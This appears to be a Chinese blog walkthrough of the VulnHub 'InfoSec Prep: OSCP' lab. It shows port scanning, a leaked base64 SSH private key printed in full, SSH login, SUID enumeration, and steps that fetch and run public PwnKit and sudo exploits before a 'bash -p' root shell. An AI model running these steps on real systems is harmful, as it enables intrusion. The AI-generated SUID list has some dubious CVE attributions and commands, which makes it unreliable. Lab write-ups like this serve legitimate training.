InfoSec Prep: OSCP靶場滲透

InfoSec Prep: OSCP
InfoSec Prep: OSCP ~ VulnHubInfoSec Prep: OSCP, made by FalconSpy. Download & walkthrough links are available.https://www.vulnhub.com/entry/infosec-prep-oscp,508/

1,將兩臺虛擬機網絡連接都改為NAT模式

2,攻擊機上做namp局域網掃描發現靶機

nmap -sn 192.168.23.0/24

那么攻擊機IP為192.168.23.182,靶場IP192.168.23.224

3,對靶機進行端口服務探測

nmap -sV -T4 -p- -A 192.168.23.224

nmap --scripts=vlun 192.168.23.224 -v

(1) CSRF漏洞(跨站請求偽造)

風險描述
掃描器在多個路徑發現無CSRF防護的表單(如搜索框、登錄表單),攻擊者可構造惡意鏈接誘騙用戶提交請求,可能導致:

  • 用戶密碼被修改
  • 惡意內容發布(如文章、評論)
  • 管理員權限被竊取(通過后臺操作)

修復建議

  • 為所有表單添加CSRF Token驗證(WordPress默認支持,需檢查主題/插件兼容性)。
  • 使用nonce機制(WordPress函數wp_nonce_field)。
  • 對關鍵操作(如密碼修改)要求二次驗證。

(2) 用戶枚舉風險

風險描述
發現用戶名admin,攻擊者可能針對此賬戶進行暴力破解。

修復建議

  • 創建新管理員賬戶,刪除或重命名admin賬戶。
  • 限制登錄嘗試次數(如使用插件Limit Login Attempts Reloaded)。
  • 啟用雙因素認證(如Google Authenticator)。

(3) 版本信息泄露

風險點

  • /readme.html泄露WordPress版本(5.4.2)。
  • 遺留文件(如/wp-includes/images/rss.png)暴露舊版本痕跡。

修復建議

  • 刪除/readme.html及無用遺留文件。
  • 更新WordPress至最新版本(當前最新為6.5+),修復已知漏洞。
  • 隱藏版本號(在functions.php中添加:remove_action('wp_head', 'wp_generator');)。

3. 其他Web風險

后臺暴露路徑

/wp-login.php/wp-admin/upgrade.php可直接訪問。
建議

  • 限制后臺訪問IP(通過.htaccess或防火墻)。
  • 修改后臺登錄路徑(使用插件WPS Hide Login)。

robots.txt泄露

  • 需檢查robots.txt是否包含敏感路徑(如備份目錄、配置文件)。

4,訪問80端口開放的http服務

然后枚舉掃描其存在的子目錄

dirsearch -u http://192.168.23.224 -x 403,404

http://192.168.23.224/robots.txt

http://192.168.23.224/secret.txt

該頁面的亂碼有base64編碼的特征,解碼就能得到內容

是一個RSA私鑰,應該會在之后的橫向移動環節用到

5,初始網頁提示了只存在一個用戶oscp

創建并且使用密鑰登錄之

-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----

vim is_rsa??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? chmod 600 is_rsa????????????????

ssh -i is_rsa oscp@192.168.23.224

登錄成功

6,信息收集一下

id

whoami

sudo -l

uname -a

查看所有具有suid權限的文件

find / -perm -u=s -type f 2>/dev/null

AI分析可能存在提權風險的SUID二進制文件及利用方法:

1.?/usr/bin/bash

  • 風險:若bash具有SUID權限,可通過bash -p嘗試獲取root shell。
  • 驗證方法
    /usr/bin/bash -p
    若成功,將直接進入root權限的shell。
  • 修復建議:移除bash的SUID位:
    sudo chmod u-s /usr/bin/bash

2.?/usr/bin/pkexec

  • 風險:受CVE-2021-4034(PwnKit漏洞)影響,低版本可本地提權。
  • 驗證方法
    檢查版本:
    pkexec --version
    若版本低于0.105-26ubuntu1.1(Ubuntu)或未打補丁,可嘗試利用公開EXP。
  • 利用步驟
    下載EXP并執行:
    git clone https://github.com/berdav/CVE-2021-4034.git
    cd CVE-2021-4034
    make
    ./cve-2021-4034
  • 修復建議:更新系統或運行apt upgrade policykit-1.

3.?/usr/bin/sudo

  • 風險:CVE-2021-3156(Baron Samedit漏洞)允許本地用戶獲得root權限。
  • 驗證方法
    檢查sudo版本:
    sudo --version
    若版本在1.8.21.8.31p2之間,可能存在風險。
  • 利用步驟
    使用公開EXP(如https://github.com/blasty/CVE-2021-3156)。

4.?/usr/lib/snapd/snap-confine

  • 風險:歷史漏洞如CVE-2021-44731(Ubuntu Snap提權)。
  • 驗證方法
    檢查snapd版本:
    snap --version
    若版本低于2.54.3,可能存在漏洞。
  • 修復建議:更新snapd:sudo apt update && sudo apt install snapd.

5.?/usr/bin/mount?或?/usr/bin/umount

  • 風險:若允許用戶掛載敏感目錄(如/etc),可能覆蓋敏感文件。
  • 利用條件:需允許非root用戶掛載特定設備。
  • 示例
    mount -o loop /dev/sda1 /mnt?? # 嘗試掛載設備
    若成功,可修改掛載目錄中的文件。

6.?/usr/bin/fusermount

  • 風險:低版本存在CVE-2018-19824,允許非root用戶掛載FUSE文件系統。
  • 驗證方法
    檢查版本:
    fusermount --version
    若版本低于2.9.9,可能存在風險。

7.?/usr/bin/chfn?或?/usr/bin/chsh

  • 風險:若配置不當(如/etc/login.defsCHFN_RESTRICT未設置),可能通過修改用戶信息提權。
  • 利用方法
    chfn -o root /etc/passwd?? # 嘗試注入root權限
    需要特定配置漏洞配合。

7,這里使用bash命令的suid提權方法

若二進制文件設置了?SUID?權限位(即?-rwsr-xr-x?),且未正確降權,攻擊者可能利用它訪問文件系統、提權或維持權限(例如作為 SUID 后門)。

在?Debian Stretch 及更早版本?中,默認允許 Shell(如?bash)以 SUID 權限運行(無需額外參數即可保留特權)。

利用步驟

  1. 創建本地 SUID 副本
    將系統的?bash?二進制文件復制到當前目錄,并保留其 SUID 權限:
    sudo install -m =xs $(which bash) .?
  • install -m =xs:設置新文件的權限為?SUID(等效于?chmod u+s)。
  • $(which bash):獲取系統默認?bash?的絕對路徑。
  1. 執行 SUID 二進制文件
    運行復制的?bash?并附加?-p?參數以保留特權:
    bash -p?
  • -p?參數:啟動特權模式(不重置 UID/EUID)。
  • 若成功,將進入?root shell(通過?id -u?驗證 UID 是否為?0)。

成功提權成為root用戶

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/76922.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/76922.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/76922.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【JavaWeb-Spring boot】學習筆記

目錄 <<回到導覽Spring boot1. http協議1.1.請求協議1.2.響應協議 2.Tomcat2.1.請求2.1.1.apifox2.1.2.簡單參數2.1.3.實體參數2.1.4.數組集合參數2.1.5.日期參數2.1.6.(重點)JSON參數2.1.7.路徑參數 2.2.響應2.3.綜合練習 3.三層架構3.1.三層拆分3.2.分層解耦3.3.補充 &…

C++的多態-上

目錄 多態的概念 多態的定義及實現 1.虛函數 2. 多態的實現 2.1.多態構成條件 2.2.虛函數重寫的兩個例外 (1)協變(基類與派生類虛函數返回值類型不同) (2)析構函數的重寫(基類與派生類析構函數的名字不同) 2.3.多態的實現 2.4.多態在析構函數中的應用 2.5.多態構成條…

網絡安全的重要性與防護措施

隨著信息技術的飛速發展&#xff0c;互聯網已經成為我們日常生活、工作和學習的必需品。無論是通過社交媒體與朋友互動&#xff0c;還是在網上進行銀行交易&#xff0c;網絡已經滲透到我們生活的方方面面。然而&#xff0c;隨之而來的是各種網絡安全問題&#xff0c;包括數據泄…

CMake學習--Window下VSCode 中 CMake C++ 代碼調試操作方法

目錄 一、背景知識二、使用方法&#xff08;一&#xff09;安裝擴展&#xff08;二&#xff09;創建 CMake 項目&#xff08;三&#xff09;編寫代碼&#xff08;四&#xff09;配置 CMakeLists.txt&#xff08;五&#xff09;生成構建文件&#xff08;六&#xff09;開始調試 …

訪問數組元素(四十四)

1. 數組下標與類型 數組的索引從 0 開始。例如&#xff0c;一個包含 10 個元素的數組&#xff0c;其合法下標范圍為 0 到 9&#xff0c;而不是 1 到 10。為了表示下標&#xff0c;通常使用 size_t 類型&#xff0c;它是一種與機器相關的無符號整型&#xff0c;足夠大以存放內存…

計算機網絡 3-1 數據鏈路層(功能+組幀+差錯控制)

【考綱內容】 &#xff08;一&#xff09;數據鏈路層的功能 &#xff08;二&#xff09;組幀 &#xff08;三&#xff09;差錯控制 檢錯編碼&#xff1b;糾錯編碼 &#xff08;四&#xff09;流量控制與可靠傳輸機制 流量控制、可靠傳輸與滑動窗口機制&#xff1b;停止-等…

Django中使用不同種類緩存的完整案例

Django中使用不同種類緩存的完整案例 推薦超級課程: 本地離線DeepSeek AI方案部署實戰教程【完全版】Docker快速入門到精通Kubernetes入門到大師通關課AWS云服務快速入門實戰目錄 Django中使用不同種類緩存的完整案例步驟1:設置Django項目步驟2:設置URL路由步驟3:視圖級別…

Spring Boot 集成Redis 的Lua腳本詳解

1. 對比Lua腳本方案與Redis自身事務 對比表格 對比維度Redis事務&#xff08;MULTI/EXEC&#xff09;Lua腳本方案原子性事務命令序列化執行&#xff0c;但中間可被其他命令打斷&#xff0c;不保證原子性Lua腳本在Redis單線程中原子執行&#xff0c;不可中斷計算能力僅支持Red…

【大模型】DeepSeek + 藍耕MaaS平臺 + 海螺AI生成高質量視頻操作詳解

目錄 一、前言 二、藍耘智能云MaaS平臺介紹 2.1 藍耘智算平臺是什么 2.2 平臺優勢 2.3 平臺核心能力 三、海螺AI視頻介紹 3.1 海螺AI視頻是什么 3.2 海螺AI視頻主要功能 3.3 海螺AI視頻應用場景 3.4 海螺AI視頻核心優勢 3.5 項目git地址 四、藍耘MaaS平臺DeepSeek海…

12-產品經理-維護模塊

需求模塊是幫助產品經理進行需求的分類和維護。 1. 維護模塊 在具體產品的“研發需求”頁面左側&#xff0c;點擊“維護模塊”。也可以在具體產品的“設置”-“模塊”下進行維護。 點擊保存后&#xff0c;返回模塊頁面。還可以點擊“子模塊”對已有模塊進行子模塊的維護。 點擊…

考研單詞筆記 2025.04.06

area n領域&#xff0c;范圍&#xff0c;方面&#xff0c;地區&#xff0c;地方&#xff0c;場地&#xff0c;面積 aspect n方面&#xff0c;層面&#xff0c;外表&#xff0c;外觀 boundary n限度&#xff0c;界限&#xff0c;分界線&#xff0c;邊界 cap n最高限額&#x…

護網藍初面試題

《網安面試指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token1860256701&langzh_CN 5000篇網安資料庫https://mp.weixin.qq.com/s?__bizMzkwNjY1Mzc0Nw&mid2247486065&idx2&snb30ade8200e842743339d428f414475e&chksmc0e4732df793fa3bf39…

玄機-apache日志分析

靶場任務 1、提交當天訪問次數最多的IP&#xff0c;即黑客IP&#xff1a; 查看apache日志 apache訪問日志的位置是&#xff1a;/var/log/apache2/access.log.1 匹配正則算法 首先先cat看看 發現地址都在第一行&#xff0c;直接匹配計算輸出 cat access.log.1 |grep -Eo &…

C++ I/O 流通俗指南

1. std::ostream 是什么&#xff1f; 定義&#xff1a;std::ostream 是 C 標準庫中的輸出流類&#xff0c;負責將數據輸出到各種目標&#xff08;如屏幕、文件、網絡等&#xff09;。你可以把 std::ostream 想象成一根“數據水管”&#xff1a; 數據從 C 代碼流進 std::ostrea…

Systemd 使用教程(二):Unit 的概念

目錄 【二】 Systemd 單元&#xff08;Unit&#xff09;的概念 本教程將由淺入深的介紹 linux 中 Systemd 的知識和相關使用&#xff08;同時也方便自己后續查閱&#xff09; 【二】 Systemd 單元&#xff08;Unit&#xff09;的概念 雖然我想介紹的比較偏實際操作&#xff0…

樹莓派PICO 設備燒錄成cmsis dap

文章目錄 1. 實際操作2. IO連接 1. 實際操作 2. IO連接

IntelliJ IDEA中Spring Boot 3.4.x+集成Redis 7.x:最新配置與實戰指南

?前言 Spring Boot 3.4.x作為當前?最新穩定版本?&#xff0c;全面支持Java 17與Jakarta EE 10規范。本文以?Spring Boot 3.4.1?和?Redis 7.x?為例&#xff0c;詳解如何在IDEA中快速接入Redis&#xff0c;涵蓋?最新依賴配置?、?數據序列化優化?、?緩存注解?及?高…

VectorBT:使用PyTorch+Transformer訓練和回測股票模型 進階五

VectorBT&#xff1a;使用PyTorchTransformer訓練和回測股票模型 進階五 本方案基于PyTorch框架與Transformer模型&#xff0c;結合VectorBT回測引擎構建多股票量化交易系統&#xff0c;采用滑動窗口技術構建時序特征&#xff0c;通過自注意力機制捕捉市場規律預測收益率&#…

4.3-4.6學習總結 Java:Set系列集合+雙列集合+Map

Set系列集合&#xff1a; 元素是唯一的。 HashSet&#xff1a; 哈希值&#xff1a; 如果沒有重寫hashcode方法和equals方法&#xff0c;那么哈希值是根據地址值計算的。 LinkedHashSet&#xff1a; TreeSet底層為紅黑樹。 紅黑樹&#xff1a;兩個紅色節點不能相連。 雙列集合&…

unreal engine5開發仿鬼泣5的游戲,把敵人擊飛到空中4連擊

UE5系列文章目錄 文章目錄 UE5系列文章目錄前言一、實現思路二、具體藍圖 前言 unreal engine5開發仿鬼泣5的游戲&#xff0c;把敵人擊飛到空中4連擊&#xff0c;先看下效果 一、實現思路 unreal engine5開發仿鬼泣5的游戲&#xff0c;把敵人擊飛到空中4連擊 在Unreal Engi…